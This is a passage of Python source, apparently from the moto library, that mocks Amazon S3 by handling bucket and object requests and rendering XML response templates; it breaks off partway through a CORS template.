# if this is a bucket or key request so we have to check
if self.subdomain_based_buckets(request):
return self.key_response(request, full_url, headers)
else:
# Using path-based buckets
return self.bucket_response(request, full_url, headers)
def bucket_response(self, request, full_url, headers):
try:
response = self._bucket_response(request, full_url, headers)
except S3ClientError as s3error:
response = s3error.code, {}, s3error.description
if isinstance(response, six.string_types):
return 200, {}, response.encode("utf-8")
else:
status_code, headers, response_content = response
return status_code, headers, response_content.encode("utf-8")
def _bucket_response(self, request, full_url, headers):
parsed_url = urlparse(full_url)
querystring = parse_qs(parsed_url.query, keep_blank_values=True)
method = request.method
region_name = DEFAULT_REGION_NAME
region_match = re.search(REGION_URL_REGEX, full_url)
if region_match:
region_name = region_match.groups()[0]
bucket_name = self.parse_bucket_name_from_url(request, full_url)
if not bucket_name:
# If no bucket specified, list all buckets
return self.all_buckets()
if hasattr(request, 'body'):
# Boto
body = request.body
else:
# Flask server
body = request.data
if body is None:
body = b''
if isinstance(body, six.binary_type):
body = body.decode('utf-8')
if method == 'HEAD':
return self._bucket_response_head(bucket_name, headers)
elif method == 'GET':
return self._bucket_response_get(bucket_name, querystring, headers)
elif method == 'PUT':
return self._bucket_response_put(request, body, region_name, bucket_name, querystring, headers)
elif method == 'DELETE':
return self._bucket_response_delete(body, bucket_name, querystring, headers)
elif method == 'POST':
return self._bucket_response_post(request, body, bucket_name, headers)
else:
raise NotImplementedError(
"Method {0} has not been impelemented in the S3 backend yet".format(method))
def _bucket_response_head(self, bucket_name, headers):
try:
self.backend.get_bucket(bucket_name)
except MissingBucket:
# Unless we do this, boto3 does not raise ClientError on
# HEAD (which the real API responds with), and instead
# raises NoSuchBucket, leading to inconsistency in
# error response between real and mocked responses.
return 404, {}, "Not Found"
return 200, {}, ""
def _bucket_response_get(self, bucket_name, querystring, headers):
if 'uploads' in querystring:
for unsup in ('delimiter', 'max-uploads'):
if unsup in querystring:
raise NotImplementedError(
"Listing multipart uploads with {} has not been implemented yet.".format(unsup))
multiparts = list(
self.backend.get_all_multiparts(bucket_name).values())
if 'prefix' in querystring:
prefix = querystring.get('prefix', [None])[0]
multiparts = [
upload for upload in multiparts if upload.key_name.startswith(prefix)]
template = self.response_template(S3_ALL_MULTIPARTS)
return template.render(
bucket_name=bucket_name,
uploads=multiparts)
elif 'location' in querystring:
bucket = self.backend.get_bucket(bucket_name)
template = self.response_template(S3_BUCKET_LOCATION)
return template.render(location=bucket.location)
elif 'lifecycle' in querystring:
bucket = self.backend.get_bucket(bucket_name)
if not bucket.rules:
template = self.response_template(S3_NO_LIFECYCLE)
return 404, {}, template.render(bucket_name=bucket_name)
template = self.response_template(
S3_BUCKET_LIFECYCLE_CONFIGURATION)
return template.render(rules=bucket.rules)
elif 'versioning' in querystring:
versioning = self.backend.get_bucket_versioning(bucket_name)
template = self.response_template(S3_BUCKET_GET_VERSIONING)
return template.render(status=versioning)
elif 'policy' in querystring:
policy = self.backend.get_bucket_policy(bucket_name)
if not policy:
template = self.response_template(S3_NO_POLICY)
return 404, {}, template.render(bucket_name=bucket_name)
return 200, {}, policy
elif 'website' in querystring:
website_configuration = self.backend.get_bucket_website_configuration(
bucket_name)
if not website_configuration:
template = self.response_template(S3_NO_BUCKET_WEBSITE_CONFIG)
return 404, {}, template.render(bucket_name=bucket_name)
return website_configuration
elif 'acl' in querystring:
bucket = self.backend.get_bucket(bucket_name)
template = self.response_template(S3_OBJECT_ACL_RESPONSE)
return template.render(obj=bucket)
elif 'tagging' in querystring:
bucket = self.backend.get_bucket(bucket_name)
# "Special Error" if no tags:
if len(bucket.tagging.tag_set.tags) == 0:
template = self.response_template(S3_NO_BUCKET_TAGGING)
return 404, {}, template.render(bucket_name=bucket_name)
template = self.response_template(S3_BUCKET_TAGGING_RESPONSE)
return template.render(bucket=bucket)
elif "cors" in querystring:
bucket = self.backend.get_bucket(bucket_name)
if len(bucket.cors) == 0:
template = self.response_template(S3_NO_CORS_CONFIG)
return 404, {}, template.render(bucket_name=bucket_name)
template = self.response_template(S3_BUCKET_CORS_RESPONSE)
return template.render(bucket=bucket)
elif 'versions' in querystring:
delimiter = querystring.get('delimiter', [None])[0]
encoding_type = querystring.get('encoding-type', [None])[0]
key_marker = querystring.get('key-marker', [None])[0]
max_keys = querystring.get('max-keys', [None])[0]
prefix = querystring.get('prefix', [''])[0]
version_id_marker = querystring.get('version-id-marker', [None])[0]
bucket = self.backend.get_bucket(bucket_name)
versions = self.backend.get_bucket_versions(
bucket_name,
delimiter=delimiter,
encoding_type=encoding_type,
key_marker=key_marker,
max_keys=max_keys,
version_id_marker=version_id_marker,
prefix=prefix
)
latest_versions = self.backend.get_bucket_latest_versions(
bucket_name=bucket_name
)
key_list = []
delete_marker_list = []
for version in versions:
if isinstance(version, FakeKey):
key_list.append(version)
else:
delete_marker_list.append(version)
template = self.response_template(S3_BUCKET_GET_VERSIONS)
return 200, {}, template.render(
key_list=key_list,
delete_marker_list=delete_marker_list,
latest_versions=latest_versions,
bucket=bucket,
prefix='',
max_keys=1000,
delimiter='',
is_truncated='false',
)
elif querystring.get('list-type', [None])[0] == '2':
return 200, {}, self._handle_list_objects_v2(bucket_name, querystring)
bucket = self.backend.get_bucket(bucket_name)
prefix = querystring.get('prefix', [None])[0]
if prefix and isinstance(prefix, six.binary_type):
prefix = prefix.decode("utf-8")
delimiter = querystring.get('delimiter', [None])[0]
result_keys, result_folders = self.backend.prefix_query(
bucket, prefix, delimiter)
template = self.response_template(S3_BUCKET_GET_RESPONSE)
return 200, {}, template.render(
bucket=bucket,
prefix=prefix,
delimiter=delimiter,
result_keys=result_keys,
result_folders=result_folders
)
def _handle_list_objects_v2(self, bucket_name, querystring):
template = self.response_template(S3_BUCKET_GET_RESPONSE_V2)
bucket = self.backend.get_bucket(bucket_name)
prefix = querystring.get('prefix', [None])[0]
if prefix and isinstance(prefix, six.binary_type):
prefix = prefix.decode("utf-8")
delimiter = querystring.get('delimiter', [None])[0]
result_keys, result_folders = self.backend.prefix_query(
bucket, prefix, delimiter)
fetch_owner = querystring.get('fetch-owner', [False])[0]
max_keys = int(querystring.get('max-keys', [1000])[0])
continuation_token = querystring.get('continuation-token', [None])[0]
start_after = querystring.get('start-after', [None])[0]
if continuation_token or start_after:
limit = continuation_token or start_after
continuation_index = 0
for key in result_keys:
if key.name > limit:
break
continuation_index += 1
result_keys = result_keys[continuation_index:]
if len(result_keys) > max_keys:
is_truncated = 'true'
result_keys = result_keys[:max_keys]
next_continuation_token = result_keys[-1].name
else:
is_truncated = 'false'
next_continuation_token = None
return template.render(
bucket=bucket,
prefix=prefix or '',
delimiter=delimiter,
result_keys=result_keys,
result_folders=result_folders,
fetch_owner=fetch_owner,
max_keys=max_keys,
is_truncated=is_truncated,
next_continuation_token=next_continuation_token,
start_after=None if continuation_token else start_after
)
def _bucket_response_put(self, request, body, region_name, bucket_name, querystring, headers):
if not request.headers.get('Content-Length'):
return 411, {}, "Content-Length required"
if 'versioning' in querystring:
ver = re.search('<Status>([A-Za-z]+)</Status>', body)
if ver:
self.backend.set_bucket_versioning(bucket_name, ver.group(1))
template = self.response_template(S3_BUCKET_VERSIONING)
return template.render(bucket_versioning_status=ver.group(1))
else:
return 404, {}, ""
elif 'lifecycle' in querystring:
rules = xmltodict.parse(body)['LifecycleConfiguration']['Rule']
if not isinstance(rules, list):
                # If there is only one rule, xmltodict returns just the item
rules = [rules]
self.backend.set_bucket_lifecycle(bucket_name, rules)
return ""
elif 'policy' in querystring:
self.backend.set_bucket_policy(bucket_name, body)
return 'True'
elif 'acl' in querystring:
acl = self._acl_from_headers(request.headers)
# TODO: Support the XML-based ACL format
self.backend.set_bucket_acl(bucket_name, acl)
return ""
elif "tagging" in querystring:
tagging = self._bucket_tagging_from_xml(body)
self.backend.put_bucket_tagging(bucket_name, tagging)
return ""
elif 'website' in querystring:
self.backend.set_bucket_website_configuration(bucket_name, body)
return ""
elif "cors" in querystring:
from moto.s3.exceptions import MalformedXML
try:
self.backend.put_bucket_cors(bucket_name, self._cors_from_xml(body))
return ""
except KeyError:
raise MalformedXML()
else:
if body:
try:
region_name = xmltodict.parse(body)['CreateBucketConfiguration']['LocationConstraint']
except KeyError:
pass
try:
new_bucket = self.backend.create_bucket(
bucket_name, region_name)
except BucketAlreadyExists:
if region_name == DEFAULT_REGION_NAME:
# us-east-1 has different behavior
new_bucket = self.backend.get_bucket(bucket_name)
else:
raise
template = self.response_template(S3_BUCKET_CREATE_RESPONSE)
return 200, {}, template.render(bucket=new_bucket)
def _bucket_response_delete(self, body, bucket_name, querystring, headers):
if 'policy' in querystring:
self.backend.delete_bucket_policy(bucket_name, body)
return 204, {}, ""
elif "tagging" in querystring:
self.backend.delete_bucket_tagging(bucket_name)
return 204, {}, ""
elif "cors" in querystring:
self.backend.delete_bucket_cors(bucket_name)
return 204, {}, ""
elif 'lifecycle' in querystring:
bucket = self.backend.get_bucket(bucket_name)
bucket.delete_lifecycle()
return 204, {}, ""
removed_bucket = self.backend.delete_bucket(bucket_name)
if removed_bucket:
# Bucket exists
template = self.response_template(S3_DELETE_BUCKET_SUCCESS)
return 204, {}, template.render(bucket=removed_bucket)
else:
# Tried to delete a bucket that still has keys
template = self.response_template(
S3_DELETE_BUCKET_WITH_ITEMS_ERROR)
return 409, {}, template.render(bucket=removed_bucket)
def _bucket_response_post(self, request, body, bucket_name, headers):
if not request.headers.get('Content-Length'):
return 411, {}, "Content-Length required"
path = request.path if hasattr(request, 'path') else request.path_url
if self.is_delete_keys(request, path, bucket_name):
return self._bucket_response_delete_keys(request, body, bucket_name, headers)
# POST to bucket-url should create file from form
if hasattr(request, 'form'):
# Not HTTPretty
form = request.form
else:
# HTTPretty, build new form object
form = {}
for kv in body.split('&'):
k, v = kv.split('=')
form[k] = v
key = form['key']
if 'file' in form:
f = form['file']
else:
f = request.files['file'].stream.read()
new_key = self.backend.set_key(bucket_name, key, f)
# Metadata
metadata = metadata_from_headers(form)
new_key.set_metadata(metadata)
return 200, {}, ""
def _bucket_response_delete_keys(self, request, body, bucket_name, headers):
template = self.response_template(S3_DELETE_KEYS_RESPONSE)
keys = minidom.parseString(body).getElementsByTagName('Key')
deleted_names = []
error_names = []
for k in keys:
key_name = k.firstChild.nodeValue
success = self.backend.delete_key(bucket_name, key_name)
if success:
deleted_names.append(key_name)
else:
error_names.append(key_name)
return 200, {}, template.render(deleted=deleted_names, delete_errors=error_names)
def _handle_range_header(self, request, headers, response_content):
response_headers = {}
length = len(response_content)
last = length - 1
_, rspec = request.headers.get('range').split('=')
if ',' in rspec:
raise NotImplementedError(
"Multiple range specifiers not supported")
def toint(i):
return int(i) if i else None
begin, end = map(toint, rspec.split('-'))
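        # rspec is "start-end", "start-" (to end of content) or "-N" (suffix: last N bytes)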
if begin is not None: # byte range
end = last if end is None else min(end, last)
elif end is not None: # suffix byte range
begin = length - min(end, length)
end = last
else:
return 400, response_headers, ""
if begin < 0 or end > last or begin > min(end, last):
return 416, response_headers, ""
response_headers['content-range'] = "bytes {0}-{1}/{2}".format(
begin, end, length)
return 206, response_headers, response_content[begin:end + 1]
def key_response(self, request, full_url, headers):
response_headers = {}
try:
response = self._key_response(request, full_url, headers)
except S3ClientError as s3error:
response = s3error.code, {}, s3error.description
if isinstance(response, six.string_types):
status_code = 200
response_content = response
else:
status_code, response_headers, response_content = response
if status_code == 200 and 'range' in request.headers:
return self._handle_range_header(request, response_headers, response_content)
return status_code, response_headers, response_content
def _key_response(self, request, full_url, headers):
parsed_url = urlparse(full_url)
query = parse_qs(parsed_url.query, keep_blank_values=True)
method = request.method
key_name = self.parse_key_name(request, parsed_url.path)
bucket_name = self.parse_bucket_name_from_url(request, full_url)
if hasattr(request, 'body'):
# Boto
body = request.body
if hasattr(body, 'read'):
body = body.read()
else:
# Flask server
body = request.data
if body is None:
body = b''
if method == 'GET':
return self._key_response_get(bucket_name, query, key_name, headers)
elif method == 'PUT':
return self._key_response_put(request, body, bucket_name, query, key_name, headers)
elif method == 'HEAD':
return self._key_response_head(bucket_name, query, key_name, headers=request.headers)
elif method == 'DELETE':
return self._key_response_delete(bucket_name, query, key_name, headers)
elif method == 'POST':
return self._key_response_post(request, body, bucket_name, query, key_name, headers)
else:
raise NotImplementedError(
"Method {0} has not been implemented in the S3 backend yet".format(method))
def _key_response_get(self, bucket_name, query, key_name, headers):
response_headers = {}
if query.get('uploadId'):
upload_id = query['uploadId'][0]
parts = self.backend.list_multipart(bucket_name, upload_id)
template = self.response_template(S3_MULTIPART_LIST_RESPONSE)
return 200, response_headers, template.render(
bucket_name=bucket_name,
key_name=key_name,
upload_id=upload_id,
count=len(parts),
parts=parts
)
version_id = query.get('versionId', [None])[0]
key = self.backend.get_key(
bucket_name, key_name, version_id=version_id)
if key is None:
raise MissingKey(key_name)
if 'acl' in query:
template = self.response_template(S3_OBJECT_ACL_RESPONSE)
return 200, response_headers, template.render(obj=key)
if 'tagging' in query:
template = self.response_template(S3_OBJECT_TAGGING_RESPONSE)
return 200, response_headers, template.render(obj=key)
response_headers.update(key.metadata)
response_headers.update(key.response_dict)
return 200, response_headers, key.value
def _key_response_put(self, request, body, bucket_name, query, key_name, headers):
response_headers = {}
if query.get('uploadId') and query.get('partNumber'):
upload_id = query['uploadId'][0]
part_number = int(query['partNumber'][0])
if 'x-amz-copy-source' in request.headers:
src = request.headers.get("x-amz-copy-source").lstrip("/")
src_bucket, src_key = src.split("/", 1)
src_range = request.headers.get(
'x-amz-copy-source-range', '').split("bytes=")[-1]
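                # The copy range header has the form "bytes=<start>-<end>"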
try:
start_byte, end_byte = src_range.split("-")
start_byte, end_byte = int(start_byte), int(end_byte)
except ValueError:
start_byte, end_byte = None, None
key = self.backend.copy_part(
bucket_name, upload_id, part_number, src_bucket,
src_key, start_byte, end_byte)
template = self.response_template(S3_MULTIPART_UPLOAD_RESPONSE)
response = template.render(part=key)
else:
key = self.backend.set_part(
bucket_name, upload_id, part_number, body)
response = ""
response_headers.update(key.response_dict)
return 200, response_headers, response
storage_class = request.headers.get('x-amz-storage-class', 'STANDARD')
acl = self._acl_from_headers(request.headers)
tagging = self._tagging_from_headers(request.headers)
if 'acl' in query:
key = self.backend.get_key(bucket_name, key_name)
# TODO: Support the XML-based ACL format
key.set_acl(acl)
return 200, response_headers, ""
if 'tagging' in query:
tagging = self._tagging_from_xml(body)
self.backend.set_key_tagging(bucket_name, key_name, tagging)
return 200, response_headers, ""
if 'x-amz-copy-source' in request.headers:
# Copy key
src_key_parsed = urlparse(request.headers.get("x-amz-copy-source"))
src_bucket, src_key = src_key_parsed.path.lstrip("/").split("/", 1)
src_version_id = parse_qs(src_key_parsed.query).get(
'versionId', [None])[0]
self.backend.copy_key(src_bucket, src_key, bucket_name, key_name,
storage=storage_class, acl=acl, src_version_id=src_version_id)
new_key = self.backend.get_key(bucket_name, key_name)
mdirective = request.headers.get('x-amz-metadata-directive')
if mdirective is not None and mdirective == 'REPLACE':
metadata = metadata_from_headers(request.headers)
new_key.set_metadata(metadata, replace=True)
template = self.response_template(S3_OBJECT_COPY_RESPONSE)
response_headers.update(new_key.response_dict)
return 200, response_headers, template.render(key=new_key)
streaming_request = hasattr(request, 'streaming') and request.streaming
closing_connection = headers.get('connection') == 'close'
if closing_connection and streaming_request:
# Closing the connection of a streaming request. No more data
new_key = self.backend.get_key(bucket_name, key_name)
elif streaming_request:
# Streaming request, more data
new_key = self.backend.append_to_key(bucket_name, key_name, body)
else:
# Initial data
new_key = self.backend.set_key(bucket_name, key_name, body,
storage=storage_class)
request.streaming = True
metadata = metadata_from_headers(request.headers)
new_key.set_metadata(metadata)
new_key.set_acl(acl)
new_key.website_redirect_location = request.headers.get('x-amz-website-redirect-location')
new_key.set_tagging(tagging)
template = self.response_template(S3_OBJECT_RESPONSE)
response_headers.update(new_key.response_dict)
return 200, response_headers, template.render(key=new_key)
def _key_response_head(self, bucket_name, query, key_name, headers):
response_headers = {}
version_id = query.get('versionId', [None])[0]
if_modified_since = headers.get('If-Modified-Since', None)
if if_modified_since:
if_modified_since = str_to_rfc_1123_datetime(if_modified_since)
key = self.backend.get_key(
bucket_name, key_name, version_id=version_id)
if key:
response_headers.update(key.metadata)
response_headers.update(key.response_dict)
if if_modified_since and key.last_modified < if_modified_since:
return 304, response_headers, 'Not Modified'
else:
return 200, response_headers, ""
else:
return 404, response_headers, ""
def _acl_from_headers(self, headers):
canned_acl = headers.get('x-amz-acl', '')
if canned_acl:
return get_canned_acl(canned_acl)
grants = []
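        # Each x-amz-grant-<permission> header holds a comma separated list of grantees, e.g. id="..." or uri="..."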
for header, value in headers.items():
if not header.startswith('x-amz-grant-'):
continue
permission = {
'read': 'READ',
'write': 'WRITE',
'read-acp': 'READ_ACP',
'write-acp': 'WRITE_ACP',
'full-control': 'FULL_CONTROL',
}[header[len('x-amz-grant-'):]]
grantees = []
for key_and_value in value.split(","):
key, value = re.match(
'([^=]+)="([^"]+)"', key_and_value.strip()).groups()
if key.lower() == 'id':
grantees.append(FakeGrantee(id=value))
else:
grantees.append(FakeGrantee(uri=value))
grants.append(FakeGrant(grantees, [permission]))
if grants:
return FakeAcl(grants)
else:
return None
def _tagging_from_headers(self, headers):
if headers.get('x-amz-tagging'):
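            # x-amz-tagging is a URL encoded list of tags, e.g. "key1=value1&key2=value2"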
parsed_header = parse_qs(headers['x-amz-tagging'], keep_blank_values=True)
tags = []
for tag in parsed_header.items():
tags.append(FakeTag(tag[0], tag[1][0]))
tag_set = FakeTagSet(tags)
tagging = FakeTagging(tag_set)
return tagging
else:
return FakeTagging()
def _tagging_from_xml(self, xml):
parsed_xml = xmltodict.parse(xml)
tags = []
for tag in parsed_xml['Tagging']['TagSet']['Tag']:
tags.append(FakeTag(tag['Key'], tag['Value']))
tag_set = FakeTagSet(tags)
tagging = FakeTagging(tag_set)
return tagging
def _bucket_tagging_from_xml(self, xml):
parsed_xml = xmltodict.parse(xml)
tags = []
# Optional if no tags are being sent:
if parsed_xml['Tagging'].get('TagSet'):
for tag in parsed_xml['Tagging']['TagSet']['Tag']:
tags.append(FakeTag(tag['Key'], tag['Value']))
tag_set = FakeTagSet(tags)
tagging = FakeTagging(tag_set)
return tagging
def _cors_from_xml(self, xml):
parsed_xml = xmltodict.parse(xml)
if isinstance(parsed_xml["CORSConfiguration"]["CORSRule"], list):
return [cors for cors in parsed_xml["CORSConfiguration"]["CORSRule"]]
return [parsed_xml["CORSConfiguration"]["CORSRule"]]
def _key_response_delete(self, bucket_name, query, key_name, headers):
if query.get('uploadId'):
upload_id = query['uploadId'][0]
self.backend.cancel_multipart(bucket_name, upload_id)
return 204, {}, ""
version_id = query.get('versionId', [None])[0]
self.backend.delete_key(bucket_name, key_name, version_id=version_id)
template = self.response_template(S3_DELETE_OBJECT_SUCCESS)
return 204, {}, template.render()
def _complete_multipart_body(self, body):
ps = minidom.parseString(body).getElementsByTagName('Part')
prev = 0
for p in ps:
pn = int(p.getElementsByTagName(
'PartNumber')[0].firstChild.wholeText)
            if pn <= prev:
                raise InvalidPartOrder()
            prev = pn
yield (pn, p.getElementsByTagName('ETag')[0].firstChild.wholeText)
def _key_response_post(self, request, body, bucket_name, query, key_name, headers):
if body == b'' and 'uploads' in query:
metadata = metadata_from_headers(request.headers)
multipart = self.backend.initiate_multipart(
bucket_name, key_name, metadata)
template = self.response_template(S3_MULTIPART_INITIATE_RESPONSE)
response = template.render(
bucket_name=bucket_name,
key_name=key_name,
upload_id=multipart.id,
)
return 200, {}, response
if query.get('uploadId'):
body = self._complete_multipart_body(body)
upload_id = query['uploadId'][0]
key = self.backend.complete_multipart(bucket_name, upload_id, body)
template = self.response_template(S3_MULTIPART_COMPLETE_RESPONSE)
return template.render(
bucket_name=bucket_name,
key_name=key.name,
etag=key.etag,
)
elif 'restore' in query:
es = minidom.parseString(body).getElementsByTagName('Days')
days = es[0].childNodes[0].wholeText
key = self.backend.get_key(bucket_name, key_name)
r = 202
if key.expiry_date is not None:
r = 200
key.restore(int(days))
return r, {}, ""
else:
raise NotImplementedError(
"Method POST had only been implemented for multipart uploads and restore operations, so far")
S3ResponseInstance = ResponseObject(s3_backend)
S3_ALL_BUCKETS = """<ListAllMyBucketsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<Owner>
<ID>bcaf1ffd86f41161ca5fb16fd081034f</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<Buckets>
{% for bucket in buckets %}
<Bucket>
<Name>{{ bucket.name }}</Name>
<CreationDate>2006-02-03T16:45:09.000Z</CreationDate>
</Bucket>
{% endfor %}
</Buckets>
</ListAllMyBucketsResult>"""
S3_BUCKET_GET_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>{{ bucket.name }}</Name>
<Prefix>{{ prefix }}</Prefix>
<MaxKeys>1000</MaxKeys>
<Delimiter>{{ delimiter }}</Delimiter>
<IsTruncated>false</IsTruncated>
{% for key in result_keys %}
<Contents>
<Key>{{ key.name }}</Key>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
<ETag>{{ key.etag }}</ETag>
<Size>{{ key.size }}</Size>
<StorageClass>{{ key.storage_class }}</StorageClass>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
</Contents>
{% endfor %}
{% if delimiter %}
{% for folder in result_folders %}
<CommonPrefixes>
<Prefix>{{ folder }}</Prefix>
</CommonPrefixes>
{% endfor %}
{% endif %}
</ListBucketResult>"""
S3_BUCKET_GET_RESPONSE_V2 = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>{{ bucket.name }}</Name>
<Prefix>{{ prefix }}</Prefix>
<MaxKeys>{{ max_keys }}</MaxKeys>
<KeyCount>{{ result_keys | length }}</KeyCount>
{% if delimiter %}
<Delimiter>{{ delimiter }}</Delimiter>
{% endif %}
<IsTruncated>{{ is_truncated }}</IsTruncated>
{% if next_continuation_token %}
<NextContinuationToken>{{ next_continuation_token }}</NextContinuationToken>
{% endif %}
{% if start_after %}
<StartAfter>{{ start_after }}</StartAfter>
{% endif %}
{% for key in result_keys %}
<Contents>
<Key>{{ key.name }}</Key>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
<ETag>{{ key.etag }}</ETag>
<Size>{{ key.size }}</Size>
<StorageClass>{{ key.storage_class }}</StorageClass>
{% if fetch_owner %}
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
{% endif %}
</Contents>
{% endfor %}
{% if delimiter %}
{% for folder in result_folders %}
<CommonPrefixes>
<Prefix>{{ folder }}</Prefix>
</CommonPrefixes>
{% endfor %}
{% endif %}
</ListBucketResult>"""
S3_BUCKET_CREATE_RESPONSE = """<CreateBucketResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<CreateBucketResponse>
<Bucket>{{ bucket.name }}</Bucket>
</CreateBucketResponse>
</CreateBucketResponse>"""
S3_DELETE_BUCKET_SUCCESS = """<DeleteBucketResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<DeleteBucketResponse>
<Code>204</Code>
<Description>No Content</Description>
</DeleteBucketResponse>
</DeleteBucketResponse>"""
S3_DELETE_BUCKET_WITH_ITEMS_ERROR = """<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>BucketNotEmpty</Code>
<Message>The bucket you tried to delete is not empty</Message>
<BucketName>{{ bucket.name }}</BucketName>
<RequestId>asdfasdfsdafds</RequestId>
<HostId>sdfgdsfgdsfgdfsdsfgdfs</HostId>
</Error>"""
S3_BUCKET_LOCATION = """<?xml version="1.0" encoding="UTF-8"?>
<LocationConstraint xmlns="http://s3.amazonaws.com/doc/2006-03-01/">{{ location }}</LocationConstraint>"""
S3_BUCKET_LIFECYCLE_CONFIGURATION = """<?xml version="1.0" encoding="UTF-8"?>
<LifecycleConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
{% for rule in rules %}
<Rule>
<ID>{{ rule.id }}</ID>
<Prefix>{{ rule.prefix if rule.prefix != None }}</Prefix>
<Status>{{ rule.status }}</Status>
{% if rule.storage_class %}
<Transition>
{% if rule.transition_days %}
<Days>{{ rule.transition_days }}</Days>
{% endif %}
{% if rule.transition_date %}
<Date>{{ rule.transition_date }}</Date>
{% endif %}
<StorageClass>{{ rule.storage_class }}</StorageClass>
</Transition>
{% endif %}
{% if rule.expiration_days or rule.expiration_date %}
<Expiration>
{% if rule.expiration_days %}
<Days>{{ rule.expiration_days }}</Days>
{% endif %}
{% if rule.expiration_date %}
<Date>{{ rule.expiration_date }}</Date>
{% endif %}
</Expiration>
{% endif %}
</Rule>
{% endfor %}
</LifecycleConfiguration>
"""
S3_BUCKET_VERSIONING = """<?xml version="1.0" encoding="UTF-8"?>
<VersioningConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Status>{{ bucket_versioning_status }}</Status>
</VersioningConfiguration>
"""
S3_BUCKET_GET_VERSIONING = """<?xml version="1.0" encoding="UTF-8"?>
{% if status is none %}
<VersioningConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/"/>
{% else %}
<VersioningConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Status>{{ status }}</Status>
</VersioningConfiguration>
{% endif %}
"""
S3_BUCKET_GET_VERSIONS = """<?xml version="1.0" encoding="UTF-8"?>
<ListVersionsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<Name>{{ bucket.name }}</Name>
<Prefix>{{ prefix }}</Prefix>
<KeyMarker>{{ key_marker }}</KeyMarker>
<MaxKeys>{{ max_keys }}</MaxKeys>
<IsTruncated>{{ is_truncated }}</IsTruncated>
{% for key in key_list %}
<Version>
<Key>{{ key.name }}</Key>
<VersionId>{{ key.version_id }}</VersionId>
<IsLatest>{% if latest_versions[key.name] == key.version_id %}true{% else %}false{% endif %}</IsLatest>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
<ETag>{{ key.etag }}</ETag>
<Size>{{ key.size }}</Size>
<StorageClass>{{ key.storage_class }}</StorageClass>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
</Version>
{% endfor %}
{% for marker in delete_marker_list %}
<DeleteMarker>
<Key>{{ marker.key.name }}</Key>
<VersionId>{{ marker.version_id }}</VersionId>
<IsLatest>{% if latest_versions[marker.key.name] == marker.version_id %}true{% else %}false{% endif %}</IsLatest>
<LastModified>{{ marker.key.last_modified_ISO8601 }}</LastModified>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
</DeleteMarker>
{% endfor %}
</ListVersionsResult>
"""
S3_DELETE_KEYS_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<DeleteResult xmlns="http://s3.amazonaws.com/doc/2006-03-01">
{% for k in deleted %}
<Deleted>
<Key>{{k}}</Key>
</Deleted>
{% endfor %}
{% for k in delete_errors %}
<Error>
<Key>{{k}}</Key>
</Error>
{% endfor %}
</DeleteResult>"""
S3_DELETE_OBJECT_SUCCESS = """<DeleteObjectResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<DeleteObjectResponse>
<Code>200</Code>
<Description>OK</Description>
</DeleteObjectResponse>
</DeleteObjectResponse>"""
S3_OBJECT_RESPONSE = """<PutObjectResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<PutObjectResponse>
<ETag>{{ key.etag }}</ETag>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
</PutObjectResponse>
</PutObjectResponse>"""
S3_OBJECT_ACL_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<AccessControlList>
{% for grant in obj.acl.grants %}
<Grant>
{% for grantee in grant.grantees %}
<Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="{{ grantee.type }}">
{% if grantee.uri %}
<URI>{{ grantee.uri }}</URI>
{% endif %}
{% if grantee.id %}
<ID>{{ grantee.id }}</ID>
{% endif %}
{% if grantee.display_name %}
<DisplayName>{{ grantee.display_name }}</DisplayName>
{% endif %}
</Grantee>
{% endfor %}
{% for permission in grant.permissions %}
<Permission>{{ permission }}</Permission>
{% endfor %}
</Grant>
{% endfor %}
</AccessControlList>
</AccessControlPolicy>"""
S3_OBJECT_TAGGING_RESPONSE = """\
<?xml version="1.0" encoding="UTF-8"?>
<Tagging xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<TagSet>
{% for tag in obj.tagging.tag_set.tags %}
<Tag>
<Key>{{ tag.key }}</Key>
<Value>{{ tag.value }}</Value>
</Tag>
{% endfor %}
</TagSet>
</Tagging>"""
S3_BUCKET_TAGGING_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<Tagging>
<TagSet>
{% for tag in bucket.tagging.tag_set.tags %}
<Tag>
<Key>{{ tag.key }}</Key>
<Value>{{ tag.value }}</Value>
</Tag>
{% endfor %}
</TagSet>
</Tagging>"""
S3_BUCKET_CORS_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<CORSConfiguration>
{% for cors in bucket.cors %}
<CORSRule>
{% for origin in cors.allowed_origins %}
